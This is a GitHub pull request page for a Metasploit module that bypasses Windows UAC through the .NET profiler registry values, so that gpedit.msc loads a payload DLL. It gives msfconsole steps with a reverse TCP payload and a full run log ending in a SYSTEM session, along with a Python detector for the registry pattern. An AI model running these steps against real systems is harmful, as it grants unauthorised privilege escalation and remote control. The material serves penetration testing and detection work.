
Add Windows Escalate UAC Protection Bypass (Via dot net profiler) #12516

merged 4 commits into from Nov 18, 2019



bwatters-r7 commented Oct 31, 2019

This is another one of those auto-elevate registry key UAC bypass bugs. It targets the .Net profiler. Rather than launch an exe, it causes a trusted process (gpedit.msc) to load a dll.


List the steps needed to make sure this thing works

  • Start msfconsole
  • get a 64-bit meterpreter session
  • background your session
  • use windows/local/bypassuac_dotnet_profiler
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <lhost>
  • set lport <lport>
  • set session <session>
  • set verbose true
  • run
  • getsystem
  • Verify you are system
  • Do the w00t dance


msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] UUID = 5c710086-74fa-4cce-a3fe-af4d318eed8a
[*] Writing  to HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32
[-] no implicit conversion of nil into Integer
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 3 opened ( -> at 2019-10-30 18:05:45 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...
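As an added defender-side example (not code from this PR or from Metasploit), a small correlator that flags the registry pattern the output above shows the module writing: the COR_* profiler values under HKCU\Environment plus an InprocServer32 registration in the user hive. It assumes Sysmon-style registry value-set events with user, target and details fields; the sample events are constructed by hand from that output, and the user-writable directory list is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample of registry "value set" events (Sysmon Event ID 13 style); key paths,
# CLSID and DLL name mirror the module output above, the 'dev' event is benign noise.
SAMPLE_EVENTS = [
    {"user": r"DESKTOP-D1E425Q\msfuser",
     "target": r"HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32\(Default)",
     "details": r"C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll"},
    {"user": r"DESKTOP-D1E425Q\msfuser", "target": r"HKCU\Environment\COR_PROFILER",
     "details": "{5c710086-74fa-4cce-a3fe-af4d318eed8a}"},
    {"user": r"DESKTOP-D1E425Q\msfuser", "target": r"HKCU\Environment\COR_ENABLE_PROFILING",
     "details": "1"},
    {"user": r"DESKTOP-D1E425Q\msfuser", "target": r"HKCU\Environment\COR_PROFILER_PATH",
     "details": r"C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll"},
    {"user": r"DESKTOP-D1E425Q\dev", "target": r"HKCU\Environment\JAVA_HOME",
     "details": r"C:\Program Files\Java\jdk-11"},
]

# HKCU\Environment values the CLR honours when deciding whether to load a profiler DLL.
COR_VALUE = re.compile(r"\\Environment\\(COR_PROFILER|COR_ENABLE_PROFILING|COR_PROFILER_PATH)$", re.I)
# A COM in-process server registered in the user hive (merged ahead of HKLM for that user).
CLSID_SERVER = re.compile(r"\\Software\\Classes\\CLSID\\(\{[0-9a-f-]{36}\})\\InprocServer32(\\|$)", re.I)
# Directories an unprivileged user can write to (assumed list, extend for your estate).
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Public)\\", re.I)

def analyze(events):
    # Returns {user: [reason, ...]} for users whose writes form the profiler-load pattern.
    cor_values = defaultdict(dict)   # user -> {COR_* value name: data}
    clsid_dlls = defaultdict(dict)   # user -> {clsid: dll path registered under HKCU}
    for ev in events:
        if m := COR_VALUE.search(ev["target"]):
            cor_values[ev["user"]][m.group(1).upper()] = ev["details"]
        elif m := CLSID_SERVER.search(ev["target"]):
            clsid_dlls[ev["user"]][m.group(1).lower()] = ev["details"]
    findings = {}
    for user, vals in cor_values.items():
        reasons = []
        if vals.get("COR_ENABLE_PROFILING") == "1":
            reasons.append("COR_ENABLE_PROFILING=1 applies to every process this user starts")
        clsid = vals.get("COR_PROFILER", "").lower()
        if clsid in clsid_dlls[user]:
            reasons.append(f"COR_PROFILER {clsid} resolves to user-hive DLL {clsid_dlls[user][clsid]}")
        path = vals.get("COR_PROFILER_PATH", "")
        if USER_WRITABLE.search(path):
            reasons.append(f"COR_PROFILER_PATH points into a user-writable directory: {path}")
        if reasons:
            findings[user] = reasons
    return findings
```

Any one reason is worth a look; all three from the same user within a short window, followed by an auto-elevating process such as mmc.exe loading gpedit.msc, is the pattern this module produces.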


acammack-r7 left a comment

Fun times! Just a little tidying to remember.

bwatters-r7 added 2 commits Nov 15, 2019
Add module docs
@bwatters-r7 bwatters-r7 marked this pull request as ready for review Nov 15, 2019
@bwatters-r7 bwatters-r7 removed the delayed label Nov 15, 2019
@busterb busterb self-assigned this Nov 15, 2019
@busterb busterb added docs and removed needs-docs labels Nov 18, 2019
bcook-r7 pushed a commit that referenced this pull request Nov 18, 2019
@bcook-r7 bcook-r7 merged commit 5936d2c into rapid7:master Nov 18, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 18, 2019


busterb commented Nov 18, 2019

Release Notes

The bypassuac_dotnet_profiler module has been added to the framework. It is a privilege escalation exploit that targets the .Net profiler, causing a trusted process (gpedit.msc) to load a user-controlled DLL.

@tdoan-r7 tdoan-r7 added the rn-modules label Dec 11, 2019